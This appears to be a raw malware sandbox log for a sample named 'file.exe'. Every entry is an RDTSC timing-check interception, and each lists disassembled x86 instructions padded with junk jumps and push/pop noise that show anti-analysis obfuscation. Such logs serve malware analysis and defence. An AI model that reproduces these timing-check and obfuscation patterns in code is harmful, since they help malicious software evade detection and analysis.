Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470340 second address: 54703D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B333h 0x00000009 xor esi, 0917365Eh 0x0000000f jmp 00007FA934C8B339h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA934C8B32Fh 0x00000027 jmp 00007FA934C8B333h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FA934C8B338h 0x00000033 add eax, 5EE55BE8h 0x00000039 jmp 00007FA934C8B32Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703D3 second address: 54703D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703D9 second address: 54703DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703DD second address: 54703E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B0025 second address: 54B0053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f jmp 00007FA934C8B336h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B0053 second address: 54B0065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B0065 second address: 54B007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA934C8B32Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B007A second address: 54B00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA9347D66C1h 0x00000009 sub eax, 0009A346h 0x0000000f jmp 00007FA9347D66C1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B00B3 second address: 54B00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B00BA second address: 54B00CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480481 second address: 5480487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460616 second address: 546068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA9347D66C5h 0x0000000a add eax, 76D2CBC6h 0x00000010 jmp 00007FA9347D66C1h 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c call 00007FA9347D66BCh 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movzx eax, bx 0x0000002b pushfd 0x0000002c jmp 00007FA9347D66C1h 0x00000031 or ax, AE86h 0x00000036 jmp 00007FA9347D66C1h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546068E second address: 5460694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460694 second address: 5460698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460698 second address: 546069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546069C second address: 54606AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606AB second address: 54606AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606AF second address: 54606B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606B3 second address: 54606B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606B9 second address: 54606BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606BF second address: 54606C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606C3 second address: 54606C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548009B second address: 54800CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 jmp 00007FA934C8B336h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480324 second address: 548032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548032A second address: 548032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548032E second address: 5480359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FA9347D66C6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 push edx 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A06F3 second address: 54A06F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A06F9 second address: 54A06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A06FD second address: 54A0752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA934C8B339h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FA934C8B32Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA934C8B337h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0752 second address: 54A07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e jmp 00007FA9347D66C9h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FA9347D66C1h 0x0000001a xchg eax, ecx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FA9347D66BCh 0x00000022 add ecx, 5B5ACE18h 0x00000028 jmp 00007FA9347D66BBh 0x0000002d popfd 0x0000002e pushad 0x0000002f mov al, 4Ah 0x00000031 mov bx, B906h 0x00000035 popad 0x00000036 popad 0x00000037 mov eax, dword ptr [76FB65FCh] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA9347D66BFh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07E2 second address: 54A07FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A07FF second address: 54A087C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f pushfd 0x00000010 jmp 00007FA9347D66C9h 0x00000015 jmp 00007FA9347D66BBh 0x0000001a popfd 0x0000001b popad 0x0000001c je 00007FA9A62697DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FA9347D66BBh 0x0000002b add esi, 01FD67AEh 0x00000031 jmp 00007FA9347D66C9h 0x00000036 popfd 0x00000037 mov eax, 5E6A6C37h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A087C second address: 54A08CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA934C8B32Ch 0x00000014 sub ax, 9C58h 0x00000019 jmp 00007FA934C8B32Bh 0x0000001e popfd 0x0000001f movzx esi, bx 0x00000022 popad 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 jmp 00007FA934C8B330h 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov edi, 44E114D0h 0x00000036 push edi 0x00000037 pop ecx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A08CD second address: 54A0921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA9347D66BCh 0x00000013 or al, 00000048h 0x00000016 jmp 00007FA9347D66BBh 0x0000001b popfd 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 movsx edi, cx 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA9347D66C3h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0921 second address: 54A0952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [008B2014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FA9398BBC77h 0x00000024 push FFFFFFFEh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA934C8B32Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A0952 second address: 54A09BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 0Bh 0x00000005 pushfd 0x00000006 jmp 00007FA9347D66C8h 0x0000000b adc eax, 54852A98h 0x00000011 jmp 00007FA9347D66BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007FA9347D66C4h 0x00000021 jmp 00007FA9347D66C2h 0x00000026 popad 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a call 00007FA93940706Eh 0x0000002f mov edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FA9347D66BAh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09BF second address: 54A09C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09C5 second address: 54A09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09CB second address: 54A09CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09CF second address: 54A09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA9347D66C2h 0x00000010 xor al, FFFFFFB8h 0x00000013 jmp 00007FA9347D66BBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b mov edi, ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A09FF second address: 54A0A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FA934C8B32Ch 0x0000000c mov ah, 6Eh 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FA934C8B32Dh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ecx, 79F09B63h 0x0000001d pushfd 0x0000001e jmp 00007FA934C8B338h 0x00000023 adc cx, 55A8h 0x00000028 jmp 00007FA934C8B32Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 pushad 0x00000031 push ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545011B second address: 5450140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 mov eax, ebx 0x00000008 pop edx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d pushad 0x0000000e jmp 00007FA9347D66BAh 0x00000013 popad 0x00000014 mov ebx, dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop edx 0x0000001c mov di, cx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450140 second address: 5450148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450148 second address: 545017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FA9347D66C0h 0x00000011 jmp 00007FA9347D66C5h 0x00000016 popfd 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545017A second address: 54501AF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA934C8B330h 0x00000008 adc ax, B888h 0x0000000d jmp 00007FA934C8B32Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov cx, 68FFh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov al, 49h 0x00000020 movsx edx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54501AF second address: 54501C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54501C3 second address: 5450201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FA934C8B337h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov edx, 4997AFB6h 0x00000017 popad 0x00000018 push esp 0x00000019 jmp 00007FA934C8B32Ah 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450201 second address: 5450205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450205 second address: 5450222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450222 second address: 5450232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450232 second address: 5450236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450236 second address: 5450269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FA9347D66C7h 0x0000000f je 00007FA9A62B4A74h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 40F0F3D6h 0x0000001d movsx edx, si 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450269 second address: 5450281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B334h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450281 second address: 545029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545029F second address: 54502BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54502BA second address: 5450388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA9A62B4A0Ah 0x0000000f jmp 00007FA9347D66BEh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 push ecx 0x00000019 jmp 00007FA9347D66BDh 0x0000001e pop ecx 0x0000001f mov edx, 4186B6C4h 0x00000024 popad 0x00000025 or edx, dword ptr [ebp+0Ch] 0x00000028 jmp 00007FA9347D66C3h 0x0000002d test edx, 61000000h 0x00000033 jmp 00007FA9347D66C6h 0x00000038 jne 00007FA9A62B4A08h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FA9347D66BDh 0x00000047 sub ecx, 488C8C16h 0x0000004d jmp 00007FA9347D66C1h 0x00000052 popfd 0x00000053 pushfd 0x00000054 jmp 00007FA9347D66C0h 0x00000059 sbb si, 7038h 0x0000005e jmp 00007FA9347D66BBh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450388 second address: 54503BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B332h 0x00000009 xor cx, 6A98h 0x0000000e jmp 00007FA934C8B32Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test byte ptr [esi+48h], 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54503BC second address: 54503D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54407E8 second address: 544081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA934C8B338h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544081B second address: 544081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544081F second address: 5440825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440825 second address: 5440840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dx, cx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440840 second address: 5440876 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA934C8B32Ah 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA934C8B336h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440876 second address: 544087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544087C second address: 544089B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA934C8B331h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544089B second address: 54408A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54408A1 second address: 54408C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA934C8B332h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54408C0 second address: 54408C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54408C6 second address: 54408CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54408CA second address: 54408EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA9347D66BDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54408EF second address: 544094E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B337h 0x00000009 add si, 288Eh 0x0000000e jmp 00007FA934C8B339h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub ebx, ebx 0x0000001b jmp 00007FA934C8B32Dh 0x00000020 test esi, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA934C8B32Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544094E second address: 5440954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440954 second address: 544099C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9A6770D58h 0x0000000e jmp 00007FA934C8B32Fh 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007FA934C8B331h 0x00000025 jmp 00007FA934C8B32Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544099C second address: 54409A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
